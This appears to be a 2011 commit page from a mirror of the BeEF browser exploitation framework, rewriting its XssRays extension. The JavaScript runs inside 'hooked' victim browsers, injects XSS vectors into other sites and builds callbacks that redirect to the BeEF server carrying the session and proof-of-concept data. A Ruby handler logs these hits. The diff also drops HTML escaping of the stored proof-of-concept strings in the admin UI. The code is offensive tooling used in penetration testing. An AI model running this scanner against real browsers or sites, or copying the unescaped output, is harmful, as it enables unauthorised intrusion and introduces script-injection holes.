Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

(Fixes issue 467) rewrote from scratch the XssRays handler, refactored JS and Ruby code, improved the whole thing.

Browse Source 
git-svn-id: https://beef.googlecode.com/svn/trunk@1361 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
antisnatchor
2011-10-12 14:56:50 +00:00
parent 974c23916d
commit e22332e1f8
6 changed files with 84 additions and 98 deletions
Download Patch File Download Diff File Expand all files Collapse all files

27
core/main/client/net/xssrays.js
View File

@@ -33,7 +33,6 @@
* Other aspects of the original code have been simplified and improved.
*/
beef.net.xssrays = {
// handler is needed when using beef.net.send
handler: "xssrays",
completed:0,
totalConnections:0,
@@ -41,7 +40,7 @@ beef.net.xssrays = {
// BeEF variables
xssraysScanId : 0,
hookedBrowserSession: "",
beefUrl: "",
beefRayUrl: "",
// the 3 following variables are overridden via BeEF, in the Scan Config XssRays sub-tab.
crossDomain: false,
debug:false,
@@ -110,7 +109,8 @@ beef.net.xssrays = {
this.xssraysScanId = xssraysScanId;
this.hookedBrowserSession = hookedBrowserSession;
this.beefUrl = beefUrl;
this.beefRayUrl = beefUrl + '/' + this.handler;
beef.net.xssrays.printDebug("Using [" + this.beefRayUrl + "] handler to contact back BeEF");
this.crossDomain = crossDomain;
this.cleanUpTimeout = timeout;
this.debug = debug;
@@ -120,11 +120,9 @@ beef.net.xssrays = {
this.runJobs();
},
complete:function() {
beef.net.xssrays.printDebug("complete beef.net.xssrays.completed [" + beef.net.xssrays.completed
+ "] - beef.net.xssrays.totalConnections [" + beef.net.xssrays.totalConnections + "]");
if (beef.net.xssrays.completed == beef.net.xssrays.totalConnections) {
beef.net.xssrays.printDebug("COMPLETE, notifying BeEF for scan id [" + beef.net.xssrays.xssraysScanId + "]");
beef.net.send('/xssrays', beef.net.xssrays.xssraysScanId, "");
$j.get(this.beefRayUrl, { hbsess: this.hookedBrowserSession, raysid: this.xssraysScanId, action: "finish"} );
} else {
this.getNextJob();
}
@@ -138,9 +136,8 @@ beef.net.xssrays = {
that.completed++;
func.call(that);
}
}else{ //nothing to scan
beef.net.xssrays.printDebug("COMPLETE, notifying BeEF for scan id [" + beef.net.xssrays.xssraysScanId + "]");
beef.net.send('/xssrays', beef.net.xssrays.xssraysScanId, "");
}else{ //nothing else to scan
this.complete();
}
},
scan:function() {
@@ -326,8 +323,8 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefUrl + "?hbsess=" + this.hookedBrowserSession + "&raysscanid=" + this.xssraysScanId
+ "&poc=" + ray.vector.poc + "&name=" + ray.vector.name + "&method=" + ray.vector.method + "'";
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = vector.input.replace(/XSS/g, beefCallback);
@@ -346,8 +343,8 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefUrl + "?hbsess=" + this.hookedBrowserSession + "&raysscanid=" + this.xssraysScanId
+ "&poc=" + ray.vector.poc + "&name=" + ray.vector.name + "&method=" + ray.vector.method + "'";
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = vector.input.replace(/XSS/g, beefCallback);
@@ -384,8 +381,8 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefUrl + "?hbsess=" + this.hookedBrowserSession + "&raysscanid=" + this.xssraysScanId
+ "&poc=" + ray.vector.poc + "&name=" + ray.vector.name + "&method=" + ray.vector.method + "'";
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';

38
extensions/admin_ui/controllers/xssrays/xssrays.rb
View File

@@ -33,7 +33,6 @@ class Xssrays < BeEF::Extension::AdminUI::HttpController
'paths' => {
'/set_scan_target' => method(:set_scan_target),
'/zombie.json' => method(:get_xssrays_logs),
'/rays' => method(:parse_rays),
'/createNewScan' => method(:create_new_scan)
}
})
@@ -60,22 +59,13 @@ class Xssrays < BeEF::Extension::AdminUI::HttpController
'id' => log.id,
'vector_method' => log.vector_method,
'vector_name' => log.vector_name,
'vector_poc' => escape_for_html(log.vector_poc)
'vector_poc' => log.vector_poc
}
}
@body = {'success' => 'true', 'logs' => logs}.to_json
end
def escape_for_html(str)
str.gsub!(/</, '&lt;')
str.gsub!(/>/, '&gt;')
str.gsub!(/\u0022/, '&quot;')
str.gsub!(/\u0027/, '&#39;')
str.gsub!(/\\/, '&#92;')
str
end
# called by the UI. needed to pass the hooked browser ID/session and store a new scan in the DB.
# This is called when right-clicking the hooked browser from the tree. Default config options are read from config.yaml
def set_scan_target
@@ -128,32 +118,6 @@ class Xssrays < BeEF::Extension::AdminUI::HttpController
print_info("[XSSRAYS] Starting XSSRays on HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
end
end
# parse incoming rays: rays are veryfied XSS, as the attack vector is calling back BeEF when executed.
def parse_rays
print_debug("[XSSRAYS] Received ray: \n #{@params.to_s}")
hooked_browser = HB.first(:session => @params['hbsess'].to_s)
if(hooked_browser != nil)
xssrays_scan = XS.first(:id => @params['raysscanid'])
if(xssrays_scan != nil)
xssrays_detail = XD.new(
:hooked_browser_id => hooked_browser.id,
:vector_name => @params['name'],
:vector_method => @params['method'],
:vector_poc => @params['poc'],
:xssraysscan_id => xssrays_scan.id
)
xssrays_detail.save
end
print_info("[XSSRAYS] Received ray from HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
end
end
end

2
extensions/xssrays/api.rb
View File

@@ -24,7 +24,7 @@ module Xssrays
# We register the http handler for the requester.
# This http handler will retrieve the http responses for all requests
def self.mount_handler(beef_server)
beef_server.mount('/xssrays', false, BeEF::Extension::Xssrays::Handler)
beef_server.mount('/xssrays', true, BeEF::Extension::Xssrays::Handler)
end
end

7
extensions/xssrays/api/scan.rb
View File

@@ -23,12 +23,11 @@ module BeEF
include BeEF::Core::Handlers::Modules::BeEFJS
#
# Add the xssrays mian JS file to the victim DOM if there is a not started scan entry in the db.
# Add the xssrays main JS file to the victim DOM if there is a not-yet-started scan entry in the db.
#
def start_scan(hb, body)
@body = body
hb = BeEF::Core::Models::HookedBrowser.first(:id => hb.id)
#TODO: we should get the xssrays_scan table with more accuracy, if for some reasons we requested
#TODO: 2 scans on the same hooked browsers, "first" could not get the right result we want
@@ -43,8 +42,8 @@ module BeEF
# build the beefjs xssrays component
build_missing_beefjs_components 'beef.net.xssrays'
# the URI of the HTTP controller where rays should come back if the vulnerability is verified
beefurl = "#{BeEF::Core::Server.instance.url}/ui/xssrays/rays"
# the URI of the XssRays handler where rays should come back if the vulnerability is verified
beefurl = BeEF::Core::Server.instance.url
cross_domain = xs.cross_domain
timeout = xs.clean_timeout
debug = BeEF::Core::Configuration.instance.get("beef.extension.xssrays.js_console_logs")

5
extensions/xssrays/config.yaml
View File

@@ -20,5 +20,6 @@ beef:
name: 'XSSRays'
authors: ["antisnatchor"]
clean_timeout: 5000
cross_domain: false
js_console_logs: true
cross_domain: true
# set js_console_logs to false when using BeEF in production (also because IE browser doesn't support the console object)
js_console_logs: false

103
extensions/xssrays/handler.rb
View File

@@ -14,51 +14,76 @@
# limitations under the License.
#
module BeEF
module Extension
module Xssrays
module Extension
module Xssrays
class Handler < WEBrick::HTTPServlet::AbstractServlet
attr_reader :guard
XS = BeEF::Core::Models::Xssraysscan
XD = BeEF::Core::Models::Xssraysdetail
HB = BeEF::Core::Models::HookedBrowser
class Handler < WEBrick::HTTPServlet::AbstractServlet
#
# Class constructor
#
def initialize(data)
# we set up a mutex
@guard = Mutex.new
@data = data
setup()
end
def setup()
XS = BeEF::Core::Models::Xssraysscan
XD = BeEF::Core::Models::Xssraysdetail
HB = BeEF::Core::Models::HookedBrowser
# validates the hook token
beef_hook = @data['beefhook'] || nil
raise WEBrick::HTTPStatus::BadRequest, "beefhook is null" if beef_hook.nil?
# validates the scan id
scan_id = @data['cid'] || nil
raise WEBrick::HTTPStatus::BadRequest, "Scan id (cid) is null" if scan_id.nil?
def do_GET(request, response)
@request = request
# validates that a hooked browser with the beef_hook token exists in the db
hooked_browser = HB.first(:session => beef_hook) || nil
raise WEBrick::HTTPStatus::BadRequest, "Invalid beefhook id: the hooked browser cannot be found in the database" if hooked_browser.nil?
# update the XssRays scan table, marking the scan as finished
xssrays_scan = BeEF::Core::Models::Xssraysscan.first(:id => scan_id)
# verify if the request contains the hook token
# raise an exception if it's null or not found in the DB
beef_hook = get_param(@request.query, 'hbsess') || nil
raise WEBrick::HTTPStatus::BadRequest,
"[XSSRAYS] Invalid beefhook id: the hooked browser cannot be found in the database" if beef_hook.nil? || HB.first(:session => beef_hook) == nil
if(xssrays_scan != nil)
xssrays_scan.update(:is_finished => true, :scan_finish => Time.now)
print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] finished at [#{xssrays_scan.scan_finish}]")
rays_scan_id = get_param(@request.query, 'raysid') || nil
raise WEBrick::HTTPStatus::BadRequest, "[XSSRAYS] Raysid is null" if rays_scan_id.nil?
if (get_param(@request.query, 'action') == 'ray')
# we received a ray
parse_rays(rays_scan_id)
else
if (get_param(@request.query, 'action') == 'finish')
# we received a notification for finishing the scan
finalize_scan(rays_scan_id)
else
#invalid action
raise WEBrick::HTTPStatus::BadRequest, "[XSSRAYS] Invalid action"
end
end
end
# parse incoming rays: rays are verified XSS, as the attack vector is calling back BeEF when executed.
def parse_rays(rays_scan_id)
xssrays_scan = XS.first(:id => rays_scan_id)
hooked_browser = HB.first(:session => get_param(@request.query, 'hbsess'))
if (xssrays_scan != nil)
xssrays_detail = XD.new(
:hooked_browser_id => hooked_browser.id,
:vector_name => get_param(@request.query, 'n'),
:vector_method => get_param(@request.query, 'm'),
:vector_poc => get_param(@request.query, 'p'),
:xssraysscan_id => xssrays_scan.id
)
xssrays_detail.save
end
print_info("[XSSRAYS] Received ray from HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
print_debug("[XSSRAYS] Ray info: \n #{@request.query}")
end
# finalize the XssRays scan marking the scan as finished in the db
def finalize_scan(rays_scan_id)
xssrays_scan = BeEF::Core::Models::Xssraysscan.first(:id => rays_scan_id)
if (xssrays_scan != nil)
xssrays_scan.update(:is_finished => true, :scan_finish => Time.now)
print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] finished at [#{xssrays_scan.scan_finish}]")
end
end
#assist function for getting parameter from hash
def get_param(query, key)
return nil if query[key].nil?
query[key]
end
end
end
end
end
end
end